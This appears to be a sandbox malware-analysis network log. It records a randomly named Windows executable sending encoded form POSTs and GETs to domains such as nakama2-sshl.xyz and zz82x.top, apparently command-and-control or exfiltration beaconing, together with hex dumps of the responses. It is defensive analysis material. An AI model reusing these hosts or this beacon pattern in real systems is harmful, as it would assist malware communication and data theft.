                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 31 38 63 34 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 5c 7b 93 23 d5 75 ff 7b a7 8a ef d0 68 0c d2 10 b5 5a ad c7 bc 56 33 ce f2 72 a8 c2 40 60 89 8b 2c 5b 53 ad 56 4b ea d9 56 b7 dc dd 9a 07 cb 56 ed cc 60 17 60 1c b0 0d 26 04 c7 b1 89 0d 6b b0 89 09 54 8a 00 09 df 25 cd ec b2 7f e5 2b e4 77 ee bd dd ea 6e b5 46 1a 69 96 24 55 4c ed ce 48 f7 71 5e f7 9c 73 cf 3d 7d 6e 37 ee 7e f0 f1 07 2e 3e f3 c4 43 52 d7 ef 59 9b 0b 8d bb 65 f9 92 d9 96 2c 5f 7a e4 21 69 e5 32 5a a8 43 d2 2d cd f3 36 72 a6 b1 9c 93 2c cd ee 6c e4 b6 b5 dc a6 d4 b8 fb 92 61 b7 cc f6 65 59 1e ce cd 9c b8 32 d5 bc d5 51 84 93 e7 75 18 ad 98 4a c4 87 04 47 44 86 a4 e7 36 17 ce d1 80 04 c9 e7 1a 5d 43 6b 49 7d d7 68 9b 7b 1b 39 a7 b3 0e 39 f8 fd 75 45 71 3a fd 52 cf 50 6c 6f 51 6a 37 47 5b 95 76 73 51 d2 5c df d4 2d 23 a3 57 f4 2c 12 d2 73 8d 9e e1 6b 92 de d5 5c cf f0 37 72 4f 5f 7c 58 5e cd 49 c3 1e 5b eb 19 1b b9 1d d3 d8 ed 3b ae 9f 93 74 c7 f6 0d 1b 23 77 cd 96 df dd 68 19 3b a6 6e c8 ec 4b d1 b4 4d df d4 2c d9 d3 35 cb d8 50 4b e5 [TRUNCATED]
                                                                                                                    Data Ascii: 18c4\{#u{hZV3r@`,[SVKVV``&kT%+wnFi$ULHq^s=}n7~.>CRYe,_z!i2ZC-6r,laeY2QuJGD6]CkI}h{99uEq:RPloQj7G[vsQ\-#W,sk\7rO_|X^I[;t#wh;nKM,5PK3\Ukv! mc1*84_ncpeM8?>u&ib,g#-",pm7rZoFbgBn_|"=SI]FN]zZEUNi1u;MM2i6(pzIXyk}sde5zh60)dNukfC 1d2Gi{:5_4c%$Y+$9%ois!%-_9YW8N2tuKfk#5-G"[f}Y$d5hALW`3|vQ/yyij^-SkIeii1<CMUA.C,o]Z,c}ucl]Yl1}xO+-m%{c
                                                                                                                    Oct 9, 2024 14:20:18.095458031 CEST1236INData Raw: b6 64 d7 68 61 9c de ae 18 15 23 7b 9c 35 80 28 9d 81 27 f3 09 8e 8b 6d 80 d3 b0 bc 56 2e 4f 35 47 eb 35 0d 97 c8 d1 9b e3 a7 98 9d ae 0f 19 18 86 2d 93 54 30 7c a5 d9 d2 9b f5 6c 0c 9c 98 c4 f0 72 b9 55 5e ad 65 0f 67 42 09 85 4d d4 af 1a 2d b5
                                                                                                                    Data Ascii: dha#{5('mV.O5G5-T0|lrU^egBM-gkUc-aqYWX-]B`#BjKfjet.YaVJQ]PcA*kKZ.)$q<ZO#bZTh=FL%15PW@CJB:^TT
                                                                                                                    Oct 9, 2024 14:20:18.095470905 CEST1236INData Raw: c7 13 85 33 00 e4 13 33 20 b2 6c e1 0c 00 d9 bc 0c 78 22 ff 38 03 44 31 33 09 73 01 95 13 f4 54 1e c5 0e 78 36 c1 cb 4c f2 fc 39 fd b0 b2 80 ea 30 34 dd 07 4e 3c e4 5a 99 b6 ae 20 ac de e8 5b 83 8e 69 a3 bc 20 01 45 49 94 1d 70 8c b1 02 83 7a 69
                                                                                                                    Data Ascii: 33 lx"8D13sTx6L904N<Z [i EIpziyrxwu";(luM(xbbQ^-""2SVoRjZDZB<eF;*PU'J<t,#bNY3^c=iA*[9(dzvT
                                                                                                                    Oct 9, 2024 14:20:18.095487118 CEST1236INData Raw: b0 67 9c 0b 51 bc ed ae 23 72 2f ac a3 ce aa 30 b0 a4 81 b5 b4 94 5b 2a c1 bc 1f a0 ab 54 85 9c 63 5b 54 f4 ab e7 98 d8 04 d8 1c 91 ab e9 30 ff 3d cc 60 73 4b b8 25 23 c3 3b f7 68 ba a1 e9 dd 04 e7 d0 dd 04 d3 43 f8 1c 10 26 73 04 c4 10 54 e3 34
                                                                                                                    Data Ascii: gQ#r/0[*Tc[T0=`sK%#;hC&sT4\vr]q6Cx!mD@.($EnLn9"g+D]p)D874Defl2,:4-fm_;+7Gz|Y\Yp>}p[x
                                                                                                                    Oct 9, 2024 14:20:18.095499039 CEST896INData Raw: 53 38 0d 0f 3e f1 d8 1f 2f 07 10 f7 f2 ff 06 47 39 04 59 96 44 4a e1 49 50 7c 96 d3 40 7e e3 37 22 65 13 ce 94 7c 0d 71 6b c2 43 a3 8b 87 88 8c 4c b3 45 9b 05 65 44 68 76 6c 9b 20 35 43 94 c4 f9 4b 04 25 b8 db dd d9 32 ed b6 13 2e 62 a3 bf 59 29
                                                                                                                    Data Ascii: S8>/G9YDJIP|@~7"e|qkCLEeDhvl 5CK%2.bY)W*J]Q$H$FN[-kLR mIG>}9vWZFaM?qKZ6ayeuh;65xGH_v
                                                                                                                    Oct 9, 2024 14:20:18.095514059 CEST886INData Raw: 7b 3a d7 04 84 eb 2c 54 17 a0 4e c8 2b 43 cb 26 f2 2a 42 52 66 e8 94 ac f8 df ca f5 32 8b a0 1d 8a cc 58 e9 56 99 eb 49 3a c2 6f b3 aa c3 e0 f8 d4 b2 f8 36 ab 9a 4c ae ff ff cd aa 86 5e 26 8c 43 c4 a1 4a fc 89 79 1e 5e 01 81 48 2e 1c c1 fd 07 45
                                                                                                                    Data Ascii: {:,TN+C&*BRf2XVI:o6L^&CJy^H.E?)xB}1&vklnnX#)VsTmGQWWZ_"g??qzjNHm}nj}l\J7rtKMW$[Xm5#k}<Z52U\X


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    15192.168.2.449634183.181.83.131803732C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 9, 2024 14:20:20.435024023 CEST10833OUTPOST /ui3j/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.nakama2-sshl.xyz
                                                                                                                    Origin: http://www.nakama2-sshl.xyz
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10301
                                                                                                                    Referer: http://www.nakama2-sshl.xyz/ui3j/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Data Raw: 41 48 6b 78 3d 4a 78 32 41 7a 44 49 56 6b 68 6a 59 62 36 53 35 75 6d 6b 7a 38 34 46 4d 31 55 62 33 44 33 37 50 39 76 6e 6f 58 50 75 38 70 32 6e 30 53 7a 6a 54 68 51 56 34 7a 41 72 31 68 55 6b 6e 42 75 2b 43 43 36 66 6c 72 47 6e 56 57 2b 72 39 4d 78 52 4d 4b 32 6c 59 67 75 58 42 31 33 45 54 52 5a 46 61 41 4d 30 55 46 6b 30 55 76 59 4c 6e 52 4a 66 5a 47 7a 52 44 42 78 31 64 30 2b 74 43 57 34 6b 51 45 4e 66 59 56 61 4f 33 5a 6d 44 65 46 79 77 44 53 43 33 42 4c 56 31 58 57 5a 61 2f 38 66 34 32 7a 33 6d 44 50 79 43 35 2f 4a 4e 4f 48 39 45 50 65 69 2b 79 5a 76 76 66 4e 2b 76 68 33 2f 55 7a 75 73 4f 66 78 49 37 74 6b 31 66 53 33 65 7a 68 47 4f 4c 66 73 55 68 51 47 4c 31 44 36 62 2f 49 33 50 4b 32 44 2b 73 30 48 46 2b 43 68 69 65 58 6c 4f 33 72 45 61 59 68 45 73 76 4a 66 76 5a 58 4f 31 51 33 72 56 76 7a 50 41 45 31 6c 2f 4e 34 53 41 6c 4b 30 61 68 68 69 36 6a 30 72 4f 54 51 59 77 4e 6a 70 39 68 64 48 2b 72 44 2f 75 51 6a 47 36 46 57 79 68 2f 4e 6a 38 6f 55 34 4b 30 37 38 52 38 64 31 65 35 6d 2b 66 42 31 31 [TRUNCATED]
                                                                                                                    Data Ascii: AHkx=Jx2AzDIVkhjYb6S5umkz84FM1Ub3D37P9vnoXPu8p2n0SzjThQV4zAr1hUknBu+CC6flrGnVW+r9MxRMK2lYguXB13ETRZFaAM0UFk0UvYLnRJfZGzRDBx1d0+tCW4kQENfYVaO3ZmDeFywDSC3BLV1XWZa/8f42z3mDPyC5/JNOH9EPei+yZvvfN+vh3/UzusOfxI7tk1fS3ezhGOLfsUhQGL1D6b/I3PK2D+s0HF+ChieXlO3rEaYhEsvJfvZXO1Q3rVvzPAE1l/N4SAlK0ahhi6j0rOTQYwNjp9hdH+rD/uQjG6FWyh/Nj8oU4K078R8d1e5m+fB11+B/EUTX1ahHMGTWI9fBCvoW9aSjsW4lPnf0XRrgIqsNGfLKWis5k91guQhu2e8NVJSs7c7OKNgT5NKdDfCbh5bUSpo0u1accyrNORDo6wFGxe9A4jRizHVWOdvO/M/N+wIEikRplCZlaqAl4UV04vGZQMq5BJH5u1QOngriYbwJg1CtVjX1t3LsIXw4GTycPTUjnsfQcmDPTXPd6gyTSdS0P0sBhnkImIyCI7UVTXBxpJOu+QuHaNlWlxs9wFHkjY+tnFoynQ3nOhZGDtOIALZcvYxFtNInj62hUUOFQL9fn5LS9IgB+wSSCx6rtL3B3VU8rFRsgUzua/g7CuWyR1LRWvhFgnuIk+G3Shrq49QQ0vb1J0vhK8Cna2V/pVjRUssfqJOMj649a6MRY4+SnIx3uZPH21bbjh1yWWsos88pPqndV40Apn6GFqGjCDXDsE1RVaUZ5Qo/97Fw42SAXO8PP1oWyEjAfPquXCo3/JZ1Mjft0PZtF+30mKVu5t7oSN17k4k6GZeRaz3crtVCirItqkVx6FXg33et4wrAOAo7z1gnyG1IDvwjr7wc8VZyigfYd/O5EjBNOiF2UU2X+otT1kuvc1JywN7L7ayKsi2IWwHWqaBipu+Qi4/kBJWW8vIpZWqsjZl920WJTmWs4fAd1LVAZMQmhu8 [TRUNCATED]
                                                                                                                    Oct 9, 2024 14:20:21.448035002 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 09 Oct 2024 12:20:21 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                    Link: <http://nakama2-sshl.xyz/wp-json/>; rel="https://api.w.org/"
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 31 38 63 34 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 5c 7b 93 23 d5 75 ff 7b a7 8a ef d0 68 0c d2 10 b5 5a ad c7 bc 56 33 ce f2 72 a8 c2 40 60 89 8b 2c 5b 53 ad 56 4b ea d9 56 b7 dc dd 9a 07 cb 56 ed cc 60 17 60 1c b0 0d 26 04 c7 b1 89 0d 6b b0 89 09 54 8a 00 09 df 25 cd ec b2 7f e5 2b e4 77 ee bd dd ea 6e b5 46 1a 69 96 24 55 4c ed ce 48 f7 71 5e f7 9c 73 cf 3d 7d 6e 37 ee 7e f0 f1 07 2e 3e f3 c4 43 52 d7 ef 59 9b 0b 8d bb 65 f9 92 d9 96 2c 5f 7a e4 21 69 e5 32 5a a8 43 d2 2d cd f3 36 72 a6 b1 9c 93 2c cd ee 6c e4 b6 b5 dc a6 d4 b8 fb 92 61 b7 cc f6 65 59 1e ce cd 9c b8 32 d5 bc d5 51 84 93 e7 75 18 ad 98 4a c4 87 04 47 44 86 a4 e7 36 17 ce d1 80 04 c9 e7 1a 5d 43 6b 49 7d d7 68 9b 7b 1b 39 a7 b3 0e 39 f8 fd 75 45 71 3a fd 52 cf 50 6c 6f 51 6a 37 47 5b 95 76 73 51 d2 5c df d4 2d 23 a3 57 f4 2c 12 d2 73 8d 9e e1 6b 92 de d5 5c cf f0 37 72 4f 5f 7c 58 5e cd 49 c3 1e 5b eb 19 1b b9 1d d3 d8 ed 3b ae 9f 93 74 c7 f6 0d 1b 23 77 cd 96 df dd 68 19 3b a6 6e c8 ec 4b d1 b4 4d df d4 2c d9 d3 35 cb d8 50 4b e5 [TRUNCATED]
                                                                                                                    Data Ascii: 18c4\{#u{hZV3r@`,[SVKVV``&kT%+wnFi$ULHq^s=}n7~.>CRYe,_z!i2ZC-6r,laeY2QuJGD6]CkI}h{99uEq:RPloQj7G[vsQ\-#W,sk\7rO_|X^I[;t#wh;nKM,5PK3\Ukv! mc1*84_ncpeM8?>u&ib,g#-",pm7rZoFbgBn_|"=SI]FN]zZEUNi1u;MM2i6(pzIXyk}sde5zh60)dNukfC 1d2Gi{:5_4c%$Y+$9%ois!%-_9YW8N2tuKfk#5-G"[f}Y$d5hALW`3|vQ/yyij^-SkIeii1<CMUA.C,o]Z,c}ucl]Yl1}xO+-m%{c
                                                                                                                    Oct 9, 2024 14:20:21.448060036 CEST1236INData Raw: b6 64 d7 68 61 9c de ae 18 15 23 7b 9c 35 80 28 9d 81 27 f3 09 8e 8b 6d 80 d3 b0 bc 56 2e 4f 35 47 eb 35 0d 97 c8 d1 9b e3 a7 98 9d ae 0f 19 18 86 2d 93 54 30 7c a5 d9 d2 9b f5 6c 0c 9c 98 c4 f0 72 b9 55 5e ad 65 0f 67 42 09 85 4d d4 af 1a 2d b5
                                                                                                                    Data Ascii: dha#{5('mV.O5G5-T0|lrU^egBM-gkUc-aqYWX-]B`#BjKfjet.YaVJQ]PcA*kKZ.)$q<ZO#bZTh=FL%15PW@CJB:^TT
                                                                                                                    Oct 9, 2024 14:20:21.448080063 CEST1236INData Raw: c7 13 85 33 00 e4 13 33 20 b2 6c e1 0c 00 d9 bc 0c 78 22 ff 38 03 44 31 33 09 73 01 95 13 f4 54 1e c5 0e 78 36 c1 cb 4c f2 fc 39 fd b0 b2 80 ea 30 34 dd 07 4e 3c e4 5a 99 b6 ae 20 ac de e8 5b 83 8e 69 a3 bc 20 01 45 49 94 1d 70 8c b1 02 83 7a 69
                                                                                                                    Data Ascii: 33 lx"8D13sTx6L904N<Z [i EIpziyrxwu";(luM(xbbQ^-""2SVoRjZDZB<eF;*PU'J<t,#bNY3^c=iA*[9(dzvT
                                                                                                                    Oct 9, 2024 14:20:21.448101044 CEST1236INData Raw: b0 67 9c 0b 51 bc ed ae 23 72 2f ac a3 ce aa 30 b0 a4 81 b5 b4 94 5b 2a c1 bc 1f a0 ab 54 85 9c 63 5b 54 f4 ab e7 98 d8 04 d8 1c 91 ab e9 30 ff 3d cc 60 73 4b b8 25 23 c3 3b f7 68 ba a1 e9 dd 04 e7 d0 dd 04 d3 43 f8 1c 10 26 73 04 c4 10 54 e3 34
                                                                                                                    Data Ascii: gQ#r/0[*Tc[T0=`sK%#;hC&sT4\vr]q6Cx!mD@.($EnLn9"g+D]p)D874Defl2,:4-fm_;+7Gz|Y\Yp>}p[x
                                                                                                                    Oct 9, 2024 14:20:21.448115110 CEST1236INData Raw: 53 38 0d 0f 3e f1 d8 1f 2f 07 10 f7 f2 ff 06 47 39 04 59 96 44 4a e1 49 50 7c 96 d3 40 7e e3 37 22 65 13 ce 94 7c 0d 71 6b c2 43 a3 8b 87 88 8c 4c b3 45 9b 05 65 44 68 76 6c 9b 20 35 43 94 c4 f9 4b 04 25 b8 db dd d9 32 ed b6 13 2e 62 a3 bf 59 29
                                                                                                                    Data Ascii: S8>/G9YDJIP|@~7"e|qkCLEeDhvl 5CK%2.bY)W*J]Q$H$FN[-kLR mIG>}9vWZFaM?qKZ6ayeuh;65xGH_v
                                                                                                                    Oct 9, 2024 14:20:21.448131084 CEST546INData Raw: 56 e5 92 5a a5 22 72 84 b6 f9 8c a1 e9 72 ab 3b 43 23 0a b1 fa 8e b5 df 36 2d 2b 4e 5b b5 a4 d6 a9 cc 99 68 8b 0d 39 1d 4d 34 59 9c e6 c2 3b 0f db 9e 8c 95 75 b5 fc e6 82 72 1f bd af f5 81 07 2f 5c bc 70 49 ba 4f 59 a0 8a a9 dd be de 5e 41 71 c9
                                                                                                                    Data Ascii: VZ"rr;C#6-+N[h9M4Y;ur/\pIOY^AqU_8;6Uy${VsZ$?k7_d/a9/N-JX<`^xc32(;aVs/wj|CNOi&=~Jiw(~J@K&FT?D%


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    16192.168.2.449635183.181.83.131803732C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 9, 2024 14:20:22.968514919 CEST466OUTGET /ui3j/?AHkx=Ezegw1wupX22aLPnmkEV6IMUn2bdHQLdsNrfcd+vuVznJDvywH1CwnPb30ViPb7vM8PbtSzEB5D6DwhwIFVA+4/F1XwzKY9WGJMvD1hFh5nZW5ehHhRHPVA=&rf-LZ=JlCtuN3HqPO8C HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Host: www.nakama2-sshl.xyz
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Oct 9, 2024 14:20:23.842288971 CEST470INHTTP/1.1 301 Moved Permanently
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 09 Oct 2024 12:20:23 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 0
                                                                                                                    Connection: close
                                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                    X-Redirect-By: WordPress
                                                                                                                    Location: http://nakama2-sshl.xyz/ui3j/?AHkx=Ezegw1wupX22aLPnmkEV6IMUn2bdHQLdsNrfcd+vuVznJDvywH1CwnPb30ViPb7vM8PbtSzEB5D6DwhwIFVA+4/F1XwzKY9WGJMvD1hFh5nZW5ehHhRHPVA=&rf-LZ=JlCtuN3HqPO8C


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    17192.168.2.44963638.47.232.196803732C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 9, 2024 14:20:29.086210966 CEST710OUTPOST /ak5l/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.zz82x.top
                                                                                                                    Origin: http://www.zz82x.top
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 201
                                                                                                                    Referer: http://www.zz82x.top/ak5l/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Data Raw: 41 48 6b 78 3d 54 46 57 79 4e 4e 65 77 53 4d 6f 78 41 36 4d 74 5a 45 75 36 32 57 4a 6e 61 62 6a 4d 6f 31 31 71 77 48 30 2f 57 70 69 35 74 4e 70 4d 35 5a 70 39 31 6e 4d 42 62 70 77 55 6b 77 67 48 77 4f 36 68 38 39 55 4e 56 72 72 74 46 6e 51 42 68 4e 36 74 78 4d 34 51 58 31 6d 4f 79 49 51 38 31 56 49 59 74 52 48 64 6f 42 5a 6f 5a 67 75 4d 43 39 76 46 67 45 50 50 6d 67 74 69 39 41 54 34 78 30 45 35 4f 76 69 79 5a 4f 69 2f 67 2b 39 5a 49 38 37 42 6c 5a 4c 4b 59 32 6c 65 2f 6e 4b 66 46 4f 66 72 6f 51 31 52 77 63 34 49 7a 6d 65 6e 48 6d 6b 30 67 45 4c 54 70 2f 65 74 61 44 55 34 6d 38 45 74 43 41 3d 3d
                                                                                                                    Data Ascii: AHkx=TFWyNNewSMoxA6MtZEu62WJnabjMo11qwH0/Wpi5tNpM5Zp91nMBbpwUkwgHwO6h89UNVrrtFnQBhN6txM4QX1mOyIQ81VIYtRHdoBZoZguMC9vFgEPPmgti9AT4x0E5OviyZOi/g+9ZI87BlZLKY2le/nKfFOfroQ1Rwc4IzmenHmk0gELTp/etaDU4m8EtCA==
                                                                                                                    Oct 9, 2024 14:20:29.999377966 CEST289INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 09 Oct 2024 12:20:29 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 146
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    18192.168.2.44963738.47.232.196803732C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 9, 2024 14:20:31.630476952 CEST730OUTPOST /ak5l/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.zz82x.top
                                                                                                                    Origin: http://www.zz82x.top
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 221
                                                                                                                    Referer: http://www.zz82x.top/ak5l/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Data Raw: 41 48 6b 78 3d 54 46 57 79 4e 4e 65 77 53 4d 6f 78 42 61 63 74 57 44 61 36 2b 57 49 56 52 37 6a 4d 68 56 30 74 77 48 34 2f 57 71 75 50 34 75 4e 4d 34 34 5a 39 6e 57 4d 42 65 70 77 55 39 41 67 65 76 2b 36 71 38 39 59 46 56 75 54 74 46 6e 55 42 68 4d 4b 74 78 2f 67 66 55 46 6d 4d 37 6f 52 36 78 56 49 59 74 52 48 64 6f 42 39 43 5a 67 47 4d 43 4d 66 46 79 57 6e 4d 71 41 74 74 34 41 54 34 37 6b 45 39 4f 76 6a 56 5a 4c 44 59 67 38 31 5a 49 38 72 42 6c 4d 33 4a 43 6d 6c 59 7a 33 4b 4c 4d 4f 4f 2b 68 52 45 78 34 75 67 4b 77 46 69 66 47 67 31 75 78 31 71 45 37 2f 36 65 48 45 64 4d 72 2f 35 6b 5a 4a 6c 75 44 57 49 46 56 31 4c 2b 36 2b 51 50 5a 53 4b 42 41 2b 73 3d
                                                                                                                    Data Ascii: AHkx=TFWyNNewSMoxBactWDa6+WIVR7jMhV0twH4/WquP4uNM44Z9nWMBepwU9Agev+6q89YFVuTtFnUBhMKtx/gfUFmM7oR6xVIYtRHdoB9CZgGMCMfFyWnMqAtt4AT47kE9OvjVZLDYg81ZI8rBlM3JCmlYz3KLMOO+hREx4ugKwFifGg1ux1qE7/6eHEdMr/5kZJluDWIFV1L+6+QPZSKBA+s=
                                                                                                                    Oct 9, 2024 14:20:32.511900902 CEST289INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 09 Oct 2024 12:20:32 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 146
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    19192.168.2.44963838.47.232.196803732C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 9, 2024 14:20:34.176024914 CEST10812OUTPOST /ak5l/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.zz82x.top
                                                                                                                    Origin: http://www.zz82x.top
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10301
                                                                                                                    Referer: http://www.zz82x.top/ak5l/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Data Raw: 41 48 6b 78 3d 54 46 57 79 4e 4e 65 77 53 4d 6f 78 42 61 63 74 57 44 61 36 2b 57 49 56 52 37 6a 4d 68 56 30 74 77 48 34 2f 57 71 75 50 34 75 46 4d 34 4b 42 39 32 46 30 42 64 70 77 55 69 77 67 44 76 2b 36 37 38 39 51 2f 56 76 76 54 46 6c 63 42 75 4f 43 74 7a 4f 67 66 44 56 6d 4d 32 49 51 39 31 56 49 4a 74 52 58 5a 6f 42 74 43 5a 67 47 4d 43 50 33 46 78 45 50 4d 73 41 74 69 39 41 53 35 78 30 45 56 4f 76 72 76 5a 4c 50 69 67 74 56 5a 49 64 62 42 6d 2b 66 4a 4a 6d 6c 61 77 33 4c 4d 4d 4f 44 75 68 56 63 44 34 76 55 6b 77 43 4b 66 48 6d 34 59 68 47 50 63 34 4f 61 48 54 45 64 35 69 59 4a 32 61 4a 56 53 4b 44 55 4a 4c 57 76 78 32 63 49 4b 4d 42 53 30 66 34 73 4c 4d 70 63 42 76 33 74 52 48 6d 4c 35 72 6b 54 78 31 4e 48 66 30 44 46 2b 4e 59 34 67 66 49 6b 66 39 77 57 69 42 6d 34 74 57 4d 4a 35 35 37 66 35 32 6a 62 78 42 4c 41 64 71 46 46 62 38 57 2b 61 59 38 52 4d 59 62 6b 52 59 59 67 61 6e 55 76 47 4c 53 74 48 55 72 58 4f 41 66 33 61 74 56 63 69 41 44 4c 64 51 30 69 76 4c 67 6a 43 31 4a 2f 51 2f 71 43 5a 38 [TRUNCATED]
